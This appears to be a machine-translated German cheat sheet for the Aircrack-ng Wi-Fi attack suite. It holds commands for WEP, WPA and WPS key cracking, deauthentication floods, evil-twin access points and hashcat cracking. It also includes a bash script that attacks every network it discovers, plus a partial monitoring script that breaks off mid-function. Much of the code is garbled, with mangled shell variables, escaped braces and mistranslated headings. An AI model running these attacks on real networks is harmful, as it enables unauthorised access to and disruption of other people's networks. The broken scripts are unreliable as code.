Luftriß Cheat Blatt¶
Überblick¶
Aircrack-ng ist eine umfassende Suite mit kabellosen Netzwerk-Sicherheitsbewertungstools, die für die Prüfung von WLAN-Netzwerken und für die Prüfung von drahtlosen Sicherheits-Implementierungen konzipiert sind. Ursprünglich als Gabel des ursprünglichen Aircrack-Projekts entwickelt, hat sich Aircrack-ng zum de facto Standard für drahtlose Penetrationstests und Sicherheitsforschung entwickelt. Die Suite umfasst mehrere spezialisierte Tools, die zusammen arbeiten, um komplette drahtlose Netzwerkbewertung Fähigkeiten zu bieten, von der Paketerfassung und -injektion bis zur Verschlüsselung Schlüsselwiederherstellung und Access Point Manipulation.
Die Aircrack-ng-Suite besteht aus mehreren Kernkomponenten: Airodump-ng für drahtlose Paketerfassung und Netzwerk-Erkennung, Aireplay-ng für Paket-Injektion und Angriffs-Implementierung, Aircrack-ng für WEP und WPA/WPA2-Schlüsselrückgewinnung und Airmon-ng für drahtlose Schnittstellenverwaltung und Monitor-Modus-Konfiguration. Weitere Werkzeuge umfassen Airdecap-ng zum Entschlüsseln von erfassten Paketen, Paketforge-ng zum Erstellen von benutzerdefinierten Paketen und Airbase-ng zum Erstellen von gefälschten Access Points. Dieser modulare Ansatz ermöglicht es Sicherheitsexperten, gezielte Bewertungen durchzuführen und ihre Prüfmethodik basierend auf spezifischen Anforderungen anzupassen.
Das Framework unterstützt eine breite Palette von drahtlosen Sicherheitsprotokollen und Angriffsvektoren, einschließlich WEP-Cracking durch statistische Analyse, WPA/WPA2-Handshake-Capture und Wörterbuch-Angriffe, WPS PIN-Angriffe und verschiedene Injektionsangriffe für die Netzwerk-Resilienzprüfung. Aircrack-ng ist besonders wertvoll, um Schwachstellen-Implementierungen zu identifizieren, Zugriffspunktkonfigurationen zu testen und drahtlose Sicherheitsrichtlinien zu validieren. Mit seiner aktiven Entwicklungsgemeinschaft und umfangreichen Dokumentation ist Aircrack-ng ein unverzichtbares Werkzeug für drahtlose Sicherheitsexperten, Penetrationsprüfer und Netzwerkadministratoren, die für die Sicherung der drahtlosen Infrastruktur verantwortlich sind.
Installation¶
Ubuntu/Debian Installation¶
Installation von Aircrack-ng auf Ubuntu/Debian-Systeme:
```bash
Update system packages¶
sudo apt update && sudo apt upgrade -y
Install Aircrack-ng from repositories¶
sudo apt install -y aircrack-ng
Install additional dependencies¶
sudo apt install -y wireless-tools net-tools iw rfkill pcap-utils \ build-essential autoconf automake libtool pkg-config libnl-3-dev \ libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev \ libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev \ hostapd wpasupplicant tcpdump screen iw usbutils pciutils
Verify installation¶
aircrack-ng --help airodump-ng --help aireplay-ng --help
Check wireless interface capabilities¶
sudo airmon-ng
Install latest version from source (optional)¶
cd /tmp wget https://download.aircrack-ng.org/aircrack-ng-1.7.tar.gz tar -xzf aircrack-ng-1.7.tar.gz cd aircrack-ng-1.7
Configure and compile¶
autoreconf -i ./configure --with-experimental make -j$(nproc) sudo make install sudo ldconfig
Verify source installation¶
aircrack-ng --version ```_
CentOS/RHEL Installation¶
```bash
Install EPEL repository¶
sudo yum install -y epel-release
Install required packages¶
sudo yum groupinstall -y "Development Tools" sudo yum install -y wireless-tools iw rfkill pcap-devel openssl-devel \ sqlite-devel pcre-devel hwloc-devel cmocka-devel libnl3-devel \ autoconf automake libtool pkg-config ethtool
Install Aircrack-ng from EPEL¶
sudo yum install -y aircrack-ng
Alternative: Install from source¶
cd /tmp wget https://download.aircrack-ng.org/aircrack-ng-1.7.tar.gz tar -xzf aircrack-ng-1.7.tar.gz cd aircrack-ng-1.7
autoreconf -i ./configure --with-experimental make -j$(nproc) sudo make install
Configure firewall¶
sudo firewall-cmd --permanent --add-port=67/udp sudo firewall-cmd --permanent --add-port=68/udp sudo firewall-cmd --reload ```_
macOS Installation¶
```bash
Install Homebrew (if not already installed)¶
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
Install Aircrack-ng¶
brew install aircrack-ng
Install additional tools¶
brew install wireshark tcpdump
Verify installation¶
aircrack-ng --version
Note: macOS requires compatible USB WiFi adapter for monitor mode¶
Built-in WiFi adapters typically don't support monitor mode¶
```_
Kali Linux Installation¶
```bash
Aircrack-ng is pre-installed on Kali Linux¶
Update to latest version¶
sudo apt update sudo apt install -y aircrack-ng
Install additional wireless tools¶
sudo apt install -y reaver bully wifite hostapd-wpe freeradius-wpe \ asleap john hashcat hcxtools hcxdumptool
Verify installation¶
aircrack-ng --version ```_
Docker Installation¶
Laufende Aircrack-ng in Docker:
```bash
Create Dockerfile for Aircrack-ng¶
cat > Dockerfile.aircrack << 'EOF' FROM ubuntu:22.04
Install dependencies¶
RUN apt-get update && apt-get install -y \ aircrack-ng wireless-tools iw rfkill \ tcpdump net-tools usbutils pciutils \ && rm -rf /var/lib/apt/lists/*
Create working directory¶
WORKDIR /data
Default command¶
CMD ["aircrack-ng", "--help"] EOF
Build Docker image¶
docker build -f Dockerfile.aircrack -t aircrack-ng .
Run with USB device access (for USB WiFi adapters)¶
docker run -it --rm --privileged \ -v $(pwd):/data \ --device=/dev/bus/usb \ aircrack-ng
Run specific Aircrack-ng command¶
docker run -it --rm --privileged \ -v $(pwd):/data \ aircrack-ng \ airodump-ng --help ```_
Basisnutzung¶
Schnittstellenmanagement¶
Verwaltung von drahtlosen Schnittstellen und Monitormodus:
```bash
Check wireless interfaces¶
sudo airmon-ng
Check interface details¶
iwconfig sudo iw dev
Kill interfering processes¶
sudo airmon-ng check kill
Enable monitor mode¶
sudo airmon-ng start wlan0
Check monitor mode interface (usually wlan0mon)¶
iwconfig
Change channel¶
sudo iwconfig wlan0mon channel 6 sudo iw dev wlan0mon set channel 6
Set specific frequency¶
sudo iw dev wlan0mon set freq 2437
Disable monitor mode¶
sudo airmon-ng stop wlan0mon
Restart network services¶
sudo systemctl restart NetworkManager sudo systemctl restart wpa_supplicant ```_
Network Discovery¶
Entdecken Sie drahtlose Netzwerke und Kunden:
```bash
Basic network scan¶
sudo airodump-ng wlan0mon
Scan specific channel¶
sudo airodump-ng -c 6 wlan0mon
Scan specific BSSID¶
sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF wlan0mon
Write capture to file¶
sudo airodump-ng -w capture wlan0mon
Show only WEP networks¶
sudo airodump-ng --encrypt WEP wlan0mon
Show only WPA networks¶
sudo airodump-ng --encrypt WPA wlan0mon
Scan with manufacturer lookup¶
sudo airodump-ng -M wlan0mon
Scan specific frequency range¶
sudo airodump-ng --band a wlan0mon # 5GHz sudo airodump-ng --band bg wlan0mon # 2.4GHz
Advanced scanning options¶
sudo airodump-ng -c 1-13 --band bg -w scan_results wlan0mon
Monitor specific network and clients¶
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w target wlan0mon ```_
WEP Angriffe¶
WEP Verschlüsselungsangriffe und Schlüsselrückgewinnung:
```bash
Capture WEP traffic¶
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_capture wlan0mon
ARP replay attack (in new terminal)¶
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
Fake authentication (if needed)¶
sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
Fragmentation attack¶
sudo aireplay-ng -5 -b AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
ChopChop attack¶
sudo aireplay-ng -4 -b AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
Interactive packet replay¶
sudo aireplay-ng -2 -b AA:BB:CC:DD:EE:FF -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 wlan0mon
Crack WEP key (run when sufficient IVs collected)¶
aircrack-ng wep_capture-01.cap
Crack with specific key length¶
aircrack-ng -n 64 wep_capture-01.cap # 64-bit WEP aircrack-ng -n 128 wep_capture-01.cap # 128-bit WEP
Use custom wordlist¶
aircrack-ng -w wordlist.txt wep_capture-01.cap ```_
WPA/WPA2 Angriffe¶
WPA/WPA2 Handshake fangen und knacken:
```bash
Capture WPA handshake¶
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_capture wlan0mon
Deauthentication attack to force handshake (in new terminal)¶
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
Target specific client¶
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:AA:BB wlan0mon
Verify handshake capture¶
aircrack-ng wpa_capture-01.cap
Crack with wordlist¶
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_capture-01.cap
Crack specific BSSID¶
aircrack-ng -b AA:BB:CC:DD:EE:FF -w wordlist.txt wpa_capture-01.cap
Use custom wordlist with rules¶
aircrack-ng -w custom_wordlist.txt wpa_capture-01.cap
Crack with ESSID¶
aircrack-ng -e "NetworkName" -w wordlist.txt wpa_capture-01.cap
Show handshake without cracking¶
aircrack-ng -J hashcat_format wpa_capture-01.cap
Convert to hashcat format¶
aircrack-ng -J hashcat_hashes wpa_capture-01.cap hashcat -m 2500 hashcat_hashes.hccapx wordlist.txt ```_
WEITER Angriffe¶
WPS (WiFi Protected Setup) Angriffe:
```bash
Scan for WPS-enabled networks¶
sudo airodump-ng --wps wlan0mon
Reaver WPS PIN attack¶
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
Reaver with specific options¶
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -L -N -d 15 -T .5 -c 6
Bully WPS attack¶
sudo bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon
Pixie dust attack¶
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K
WPS PIN generation¶
sudo aircrack-ng -W pin_list.txt
Check WPS lock status¶
sudo wash -i wlan0mon ```_
Erweiterte Funktionen¶
Injektion von Zollverpackungen¶
Erstellen und Injizieren von benutzerdefinierten Paketen:
```bash
Create custom ARP packet¶
sudo packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB -k 192.168.1.1 -l 192.168.1.100 -y fragment.xor -w arp_packet
Inject custom packet¶
sudo aireplay-ng -2 -r arp_packet wlan0mon
Create custom authentication packet¶
sudo packetforge-ng -1 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB -w auth_packet
Create deauthentication packet¶
sudo packetforge-ng -1 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB -w deauth_packet
Replay captured packet¶
sudo aireplay-ng -2 -r captured_packet.cap wlan0mon
Interactive packet replay with modifications¶
sudo aireplay-ng -2 -b AA:BB:CC:DD:EE:FF -d FF:FF:FF:FF:FF:FF -m 68 -n 86 wlan0mon ```_
Access Point Creation¶
Erstellen gefälschter Access Points und böser Zwillingsangriffe:
```bash
Create open access point¶
sudo airbase-ng -e "FreeWiFi" -c 6 wlan0mon
Create WEP access point¶
sudo airbase-ng -e "SecureWiFi" -c 6 -W 1 -z 2 -Z 4 wlan0mon
Create access point with specific BSSID¶
sudo airbase-ng -e "TestAP" -c 6 -a AA:BB:CC:DD:EE:FF wlan0mon
Evil twin attack (clone existing AP)¶
sudo airbase-ng -e "TargetNetwork" -c 6 -a AA:BB:CC:DD:EE:FF wlan0mon
Capture clients connecting to fake AP¶
sudo airbase-ng -e "FreeWiFi" -c 6 -P -C 30 wlan0mon
Create multiple access points¶
sudo airbase-ng -e "AP1" -e "AP2" -e "AP3" -c 6 wlan0mon
Advanced evil twin with DHCP¶
sudo airbase-ng -e "TargetNetwork" -c 6 -a AA:BB:CC:DD:EE:FF wlan0mon & sudo ifconfig at0 192.168.1.1 netmask 255.255.255.0 sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo iptables -A FORWARD -i at0 -o eth0 -j ACCEPT echo 1 > /proc/sys/net/ipv4/ip_forward
Start DHCP server for fake AP¶
sudo dnsmasq -C /dev/null -kd -F 192.168.1.100,192.168.1.200 -i at0 --bind-dynamic ```_
Fortgeschrittene Cracking-Techniken¶
Erweiterte Passwort-Cracking und Optimierung:
```bash
Multi-threaded cracking¶
aircrack-ng -w wordlist.txt -p 4 capture.cap
Cracking with custom character set¶
crunch 8 8 abcdefghijklmnopqrstuvwxyz|aircrack-ng -w - capture.cap
Using John the Ripper with Aircrack-ng¶
aircrack-ng -J john_format capture.cap john --wordlist=wordlist.txt john_format.hccap
Hashcat integration¶
aircrack-ng -J hashcat_format capture.cap hashcat -m 2500 -a 0 hashcat_format.hccapx wordlist.txt
GPU-accelerated cracking with hashcat¶
hashcat -m 2500 -a 3 -w 3 hashcat_format.hccapx ?d?d?d?d?d?d?d?d
Mask attack with hashcat¶
hashcat -m 2500 -a 3 hashcat_format.hccapx ?u?l?l?l?l?l?d?d
Rule-based attack¶
hashcat -m 2500 -a 0 -r rules/best64.rule hashcat_format.hccapx wordlist.txt
Combination attack¶
hashcat -m 2500 -a 1 hashcat_format.hccapx wordlist1.txt wordlist2.txt
Distributed cracking setup¶
On master node:¶
hashcat -m 2500 -a 0 --session=distributed hashcat_format.hccapx wordlist.txt
On worker nodes:¶
hashcat -m 2500 -a 0 --session=worker1 --restore-file-path=distributed.restore hashcat_format.hccapx wordlist.txt ```_
Paketanalyse und Entschlüsselung¶
Analyse und Entschlüsselung erfasster Pakete:
```bash
Decrypt WEP packets¶
airdecap-ng -w 1234567890 wep_capture.cap
Decrypt WPA packets with passphrase¶
airdecap-ng -p passphrase -e "NetworkName" wpa_capture.cap
Decrypt with PMK¶
airdecap-ng -k pmk_file wpa_capture.cap
Extract specific packet types¶
airdecap-ng -t 1 capture.cap # Extract only data packets
Analyze packet statistics¶
aircrack-ng -s capture.cap
Show packet details¶
tcpdump -r decrypted_capture-dec.cap -v
Convert to other formats¶
tshark -r capture.cap -w converted.pcapng
Extract files from decrypted traffic¶
tcpflow -r decrypted_capture-dec.cap
Analyze with Wireshark¶
wireshark decrypted_capture-dec.cap ```_
Automatisierungsskripte¶
Umfassende WLAN Bewertung Script¶
```bash
!/bin/bash¶
Comprehensive WiFi security assessment script¶
Configuration¶
INTERFACE="wlan0" MONITOR_INTERFACE="" SCAN_TIME="60" ATTACK_TIME="300" OUTPUT_DIR="/tmp/wifi_assessment_$(date +%Y%m%d_%H%M%S)" WORDLIST="/usr/share/wordlists/rockyou.txt"
Create output directory¶
mkdir -p "$OUTPUT_DIR"
Logging function¶
log_message() \\{ echo "$(date '+%Y-%m-%d %H:%M:%S') - \(1"|tee -a "\)OUTPUT_DIR/assessment.log" \\}
Cleanup function¶
cleanup() \\{ log_message "Cleaning up..."
# Stop monitor mode
if [ -n "$MONITOR_INTERFACE" ]; then
sudo airmon-ng stop "$MONITOR_INTERFACE" >/dev/null 2>&1
fi
# Restart network services
sudo systemctl restart NetworkManager >/dev/null 2>&1
# Kill background processes
sudo pkill -f airodump-ng
sudo pkill -f aireplay-ng
sudo pkill -f aircrack-ng
log_message "Cleanup completed"
\\}
Signal handlers¶
trap cleanup EXIT trap cleanup INT trap cleanup TERM
Check if running as root¶
check_root() \\{ if [ "$EUID" -ne 0 ]; then echo "This script must be run as root" exit 1 fi \\}
Check dependencies¶
check_dependencies() \\{ log_message "Checking dependencies..."
local deps=("aircrack-ng" "airodump-ng" "aireplay-ng" "airmon-ng")
for dep in "$\\\\{deps[@]\\\\}"; do
if ! command -v "$dep" >/dev/null 2>&1; then
log_message "ERROR: $dep not found"
exit 1
fi
done
if [ ! -f "$WORDLIST" ]; then
log_message "WARNING: Wordlist not found at $WORDLIST"
WORDLIST=""
fi
log_message "Dependencies check passed"
\\}
Setup monitor mode¶
setup_monitor_mode() \\{ log_message "Setting up monitor mode on $INTERFACE..."
# Kill interfering processes
sudo airmon-ng check kill >/dev/null 2>&1
# Start monitor mode
local output
output=$(sudo airmon-ng start "$INTERFACE" 2>&1)
# Extract monitor interface name
| | MONITOR_INTERFACE=\((echo "\)output" | grep -o "$\\{INTERFACE\\}mon | mon[0-9]" | head -n 1) | |
if [ -z "$MONITOR_INTERFACE" ]; then
MONITOR_INTERFACE="$\\\\{INTERFACE\\\\}mon"
fi
# Verify monitor mode
if iwconfig "$MONITOR_INTERFACE" 2>/dev/null|grep -q "Mode:Monitor"; then
log_message "Monitor mode enabled on $MONITOR_INTERFACE"
else
log_message "ERROR: Failed to enable monitor mode"
exit 1
fi
\\}
Network discovery¶
network_discovery() \\{ log_message "Starting network discovery for $SCAN_TIME seconds..."
local scan_file="$OUTPUT_DIR/network_scan"
# Start airodump-ng in background
sudo airodump-ng -w "$scan_file" --output-format csv "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local airodump_pid=$!
# Wait for scan time
sleep "$SCAN_TIME"
# Stop airodump-ng
sudo kill $airodump_pid 2>/dev/null
# Parse results
if [ -f "$\\\\{scan_file\\\\}-01.csv" ]; then
log_message "Networks discovered:"
# Parse CSV and display networks
| | tail -n +2 "\(\\\\{scan_file\\\\}-01.csv" | head -n -3 | while IFS=',' read -r bssid first_seen last_seen channel speed privacy cipher auth power beacons iv lan_ip id_length essid key; do | | if [ -n "\)bssid" ] && [ "\(bssid" != "BSSID" ]; then essid=\)(echo "\(essid"|tr -d ' ') if [ -n "\)essid" ]; then log_message " BSSID: $bssid, ESSID: $essid, Channel: $channel, Encryption: $privacy"
# Save target info
echo "$bssid,$essid,$channel,$privacy" >> "$OUTPUT_DIR/targets.txt"
fi
fi
done
else
log_message "No networks discovered"
fi
\\}
WEP attack¶
wep_attack() \\{ local bssid="\(1" local essid="\)2" local channel="$3"
log_message "Starting WEP attack against $essid ($bssid)"
local capture_file="$OUTPUT_DIR/wep_$\\\\{essid\\\\}_$(echo $bssid|tr ':' '_')"
# Set channel
sudo iwconfig "$MONITOR_INTERFACE" channel "$channel"
# Start capture
sudo airodump-ng -c "$channel" --bssid "$bssid" -w "$capture_file" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local airodump_pid=$!
# Wait a bit for capture to start
sleep 5
# Try fake authentication
sudo aireplay-ng -1 0 -a "$bssid" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local auth_pid=$!
# ARP replay attack
sudo aireplay-ng -3 -b "$bssid" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local arp_pid=$!
# Wait for attack time
sleep "$ATTACK_TIME"
# Stop attacks
sudo kill $airodump_pid $auth_pid $arp_pid 2>/dev/null
# Try to crack
if [ -f "$\\\\{capture_file\\\\}-01.cap" ]; then
log_message "Attempting to crack WEP key for $essid..."
local crack_result
crack_result=$(timeout 60 aircrack-ng "$\\\\{capture_file\\\\}-01.cap" 2>/dev/null)
if echo "$crack_result"|grep -q "KEY FOUND"; then
| | local key=\((echo "\)crack_result" | grep "KEY FOUND" | cut -d'[' -f2 | cut -d']' -f1) | | log_message "SUCCESS: WEP key found for \(essid: \(key" echo "\)bssid,\)essid,WEP,\(key" >> "\)OUTPUT_DIR/cracked_keys.txt" else log_message "Failed to crack WEP key for $essid" fi fi \\}
WPA attack¶
wpa_attack() \\{ local bssid="\(1" local essid="\)2" local channel="$3"
log_message "Starting WPA attack against $essid ($bssid)"
local capture_file="$OUTPUT_DIR/wpa_$\\\\{essid\\\\}_$(echo $bssid|tr ':' '_')"
# Set channel
sudo iwconfig "$MONITOR_INTERFACE" channel "$channel"
# Start capture
sudo airodump-ng -c "$channel" --bssid "$bssid" -w "$capture_file" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local airodump_pid=$!
# Wait a bit for capture to start
sleep 5
# Deauthentication attack to capture handshake
for i in \\\\{1..5\\\\}; do
sudo aireplay-ng -0 10 -a "$bssid" "$MONITOR_INTERFACE" >/dev/null 2>&1
sleep 10
done
# Stop capture
sudo kill $airodump_pid 2>/dev/null
# Check for handshake
if [ -f "$\\\\{capture_file\\\\}-01.cap" ]; then
local handshake_check
handshake_check=$(aircrack-ng "$\\\\{capture_file\\\\}-01.cap" 2>/dev/null|grep "1 handshake")
if [ -n "$handshake_check" ]; then
log_message "Handshake captured for $essid"
# Try to crack with wordlist
if [ -n "$WORDLIST" ] && [ -f "$WORDLIST" ]; then
log_message "Attempting to crack WPA key for $essid with wordlist..."
local crack_result
crack_result=$(timeout 300 aircrack-ng -w "$WORDLIST" -b "$bssid" "$\\\\{capture_file\\\\}-01.cap" 2>/dev/null)
if echo "$crack_result"|grep -q "KEY FOUND"; then
| | local key=\((echo "\)crack_result" | grep "KEY FOUND" | cut -d'[' -f2 | cut -d']' -f1) | | log_message "SUCCESS: WPA key found for \(essid: \(key" echo "\)bssid,\)essid,WPA,\(key" >> "\)OUTPUT_DIR/cracked_keys.txt" else log_message "Failed to crack WPA key for \(essid with wordlist" echo "\)bssid,\(essid,WPA,HANDSHAKE_CAPTURED" >> "\)OUTPUT_DIR/handshakes.txt" fi else log_message "No wordlist available for WPA cracking" echo "\(bssid,\)essid,WPA,HANDSHAKE_CAPTURED" >> "$OUTPUT_DIR/handshakes.txt" fi else log_message "No handshake captured for $essid" fi fi \\}
WPS attack¶
wps_attack() \\{ local bssid="\(1" local essid="\)2" local channel="$3"
log_message "Starting WPS attack against $essid ($bssid)"
# Set channel
sudo iwconfig "$MONITOR_INTERFACE" channel "$channel"
# Check if reaver is available
if command -v reaver >/dev/null 2>&1; then
# Try Pixie Dust attack first
log_message "Attempting Pixie Dust attack on $essid..."
local pixie_result
pixie_result=$(timeout 120 reaver -i "$MONITOR_INTERFACE" -b "$bssid" -c "$channel" -K -vv 2>/dev/null)
if echo "$pixie_result"|grep -q "WPS PIN:"; then
| | local pin=\((echo "\)pixie_result" | grep "WPS PIN:" | cut -d':' -f2 | tr -d ' ') | | | | local psk=\((echo "\)pixie_result" | grep "WPA PSK:" | cut -d':' -f2 | tr -d ' ') | | log_message "SUCCESS: WPS PIN found for \(essid: (pin" log_message "SUCCESS: WPA PSK found for (essid: \(psk" echo "\)bssid,\)essid,WPS,\)pin,\)psk" >> "$OUTPUT_DIR/cracked_keys.txt" else log_message "Pixie Dust attack failed for $essid"
# Try regular WPS PIN attack (limited time)
log_message "Attempting WPS PIN brute force on $essid..."
timeout 300 reaver -i "$MONITOR_INTERFACE" -b "$bssid" -c "$channel" -vv >/dev/null 2>&1
fi
else
log_message "Reaver not available for WPS attacks"
fi
\\}
Attack networks¶
attack_networks() \\{ log_message "Starting attacks on discovered networks..."
if [ ! -f "$OUTPUT_DIR/targets.txt" ]; then
log_message "No targets found"
return
fi
while IFS=',' read -r bssid essid channel encryption; do
if [ -n "$bssid" ]; then
log_message "Attacking $essid ($bssid) - $encryption"
case "$encryption" in
*"WEP"*)
wep_attack "$bssid" "$essid" "$channel"
;;
*"WPA"*)
wpa_attack "$bssid" "$essid" "$channel"
# Also try WPS if available
wps_attack "$bssid" "$essid" "$channel"
;;
*"OPN"*)
log_message "Open network detected: $essid"
echo "$bssid,$essid,OPEN,NO_PASSWORD" >> "$OUTPUT_DIR/open_networks.txt"
;;
esac
fi
done < "$OUTPUT_DIR/targets.txt"
\\}
Generate report¶
generate_report() \\{ log_message "Generating assessment report..."
local report_file="$OUTPUT_DIR/wifi_assessment_report.html"
cat > "$report_file" << EOF
WiFi Security Assessment Report
Generated: $(date)
Interface: $INTERFACE ($MONITOR_INTERFACE)
Scan Duration: $SCAN_TIME seconds
Attack Duration: $ATTACK_TIME seconds per target
Executive Summary
EOF # Count results local total_networks=0 local cracked_networks=0 local open_networks=0 local handshakes=0 if [ -f "$OUTPUT_DIR/targets.txt" ]; then total_networks=$(wc -l < "$OUTPUT_DIR/targets.txt") fi if [ -f "$OUTPUT_DIR/cracked_keys.txt" ]; then cracked_networks=$(wc -l < "$OUTPUT_DIR/cracked_keys.txt") fi if [ -f "$OUTPUT_DIR/open_networks.txt" ]; then open_networks=$(wc -l < "$OUTPUT_DIR/open_networks.txt") fi if [ -f "$OUTPUT_DIR/handshakes.txt" ]; then handshakes=$(wc -l < "$OUTPUT_DIR/handshakes.txt") fi cat >> "$report_file" << EOF- Total networks discovered: $total_networks
- Networks with compromised security: $cracked_networks
- Open networks: $open_networks
- WPA handshakes captured: $handshakes
Discovered Networks
| BSSID | ESSID | Channel | Encryption |
|---|---|---|---|
| $bssid | $essid | $channel | $encryption |
Security Vulnerabilities
EOF if [ -f "$OUTPUT_DIR/cracked_keys.txt" ]; then echo "Compromised Networks
" >> "$report_file" echo "| BSSID | ESSID | Type | Key/PIN |
|---|---|---|---|
| $bssid | $essid | $type | $key |
Open Networks
" >> "$report_file" echo "| BSSID | ESSID |
|---|---|
| $bssid | $essid |
Assessment Log
$(cat "$OUTPUT_DIR/assessment.log")
EOF
log_message "Report generated: $report_file"
\\}
Main execution¶
main() \\{ log_message "Starting WiFi security assessment"
check_root
check_dependencies
setup_monitor_mode
network_discovery
attack_networks
generate_report
log_message "Assessment completed. Results in: $OUTPUT_DIR"
\\}
Parse command line arguments¶
while [[ \(# -gt 0 ]]; do case \(1 in -i|--interface) INTERFACE="\)2" shift 2 ;; -s|--scan-time) SCAN_TIME="\)2" shift 2 ;; -a|--attack-time) ATTACK_TIME="\(2" shift 2 ;; -w|--wordlist) WORDLIST="\)2" shift 2 ;; -h|--help) echo "Usage: $0 [OPTIONS]" echo "Options:" echo " -i, --interface IFACE Wireless interface (default: wlan0)" echo " -s, --scan-time SECONDS Network discovery time (default: 60)" echo " -a, --attack-time SECONDS Attack time per target (default: 300)" echo " -w, --wordlist FILE Wordlist for WPA cracking" echo " -h, --help Show this help" exit 0 ;; *) echo "Unknown option: $1" exit 1 ;; esac done
Run main function¶
main ```_
Integrationsbeispiele¶
Continuous Monitoring Script¶
```python
!/usr/bin/env python3¶
Aircrack-ng continuous monitoring and alerting¶
import subprocess import time import json import smtplib import logging from datetime import datetime from email.mime.text import MimeText from email.mime.multipart import MimeMultipart
class WiFiMonitor: def init(self, config): self.config = config self.interface = config.get('interface', 'wlan0mon') self.scan_interval = config.get('scan_interval', 300) # 5 minutes self.known_networks = set() self.setup_logging()
def setup_logging(self):
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler('/var/log/wifi_monitor.log'),
logging.StreamHandler()
]
)
self.logger = logging.getLogger(__name__)
def scan_networks(self):
"""Scan for wireless networks"""
try:
# Run airodump-ng for a short scan
cmd = [
'timeout', '30',
'airodump-ng', '--output-format', 'csv',
'-w', '/tmp/wifi_scan', self.interface
]
subprocess.run(cmd, capture_output=True, text=True)
# Parse results
networks = self.parse_scan_results('/tmp/wifi_scan-01.csv')
return networks
except Exception as e:
self.logger.error(f"Error scanning networks: \\\\{e\\\\}")
return []
def parse_scan_results(self, csv_file):
"""Parse airodump-ng CSV output"""
networks = []
try:
with open(csv_file, 'r') as f:
lines = f.readlines()
# Find the start of network data
start_idx = 0
for i, line in enumerate(lines):
if line.startswith('BSSID'):
start_idx = i + 1
break
# Parse network entries
for line in lines[start_idx:]:
if line.strip() and not line.startswith('Station MAC'):
parts = line.split(',')
if len(parts) >= 14:
network = \\\\{
'bssid': parts[0].strip(),
'first_seen': parts[1].strip(),
'last_seen': parts[2].strip(),
'channel': parts[3].strip(),
'speed': parts[4].strip(),
'privacy': parts[5].strip(),
'cipher': parts[6].strip(),
'authentication': parts[7].strip(),
'power': parts[8].strip(),
'beacons': parts[9].strip(),
'iv': parts[10].strip(),
'lan_ip': parts[11].strip(),
'id_length': parts[12].strip(),
'essid': parts[13].strip(),
'timestamp': datetime.now().isoformat()
\\\\}
if network['bssid'] and network['essid']:
networks.append(network)
except FileNotFoundError:
self.logger.warning(f"Scan results file not found: \\\\{csv_file\\\\}")
except Exception as e:
self.logger.error(f"Error parsing scan results: \\\\{e\\\\}")
return networks
def detect_anomalies(self, networks):
"""Detect suspicious network activity"""
alerts = []
for network in networks:
network_id = f"\\\\{network['bssid']\\\\}_\\\\{network['essid']\\\\}"
# Check for new networks
if network_id not in self.known_networks:
self.known_networks.add(network_id)
# Alert on suspicious network names
suspicious_names = [
'free', 'wifi', 'internet', 'guest', 'public',
'linksys', 'netgear', 'dlink', 'default'
]
essid_lower = network['essid'].lower()
if any(name in essid_lower for name in suspicious_names):
alerts.append(\\\\{
'type': 'suspicious_network',
'severity': 'medium',
'message': f"Suspicious network detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\})",
'network': network
\\\\})
# Alert on open networks
if 'OPN' in network['privacy']:
alerts.append(\\\\{
'type': 'open_network',
'severity': 'low',
'message': f"Open network detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\})",
'network': network
\\\\})
# Alert on WEP networks
if 'WEP' in network['privacy']:
alerts.append(\\\\{
'type': 'weak_encryption',
'severity': 'high',
'message': f"WEP network detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\})",
'network': network
\\\\})
# Alert on potential evil twins
for known_network in self.known_networks:
if known_network != network_id:
known_essid = known_network.split('_', 1)[1]
if known_essid == network['essid']:
alerts.append(\\\\{
'type': 'potential_evil_twin',
'severity': 'high',
'message': f"Potential evil twin detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\})",
'network': network
\\\\})
# Check for high power levels (potential rogue AP)
try:
power = int(network['power'])
if power > -30: # Very high signal strength
alerts.append(\\\\{
'type': 'high_power_ap',
'severity': 'medium',
'message': f"High power AP detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\}) - Power: \\\\{power\\\\}dBm",
'network': network
\\\\})
except ValueError:
pass
return alerts
def send_alert(self, alert):
"""Send alert notification"""
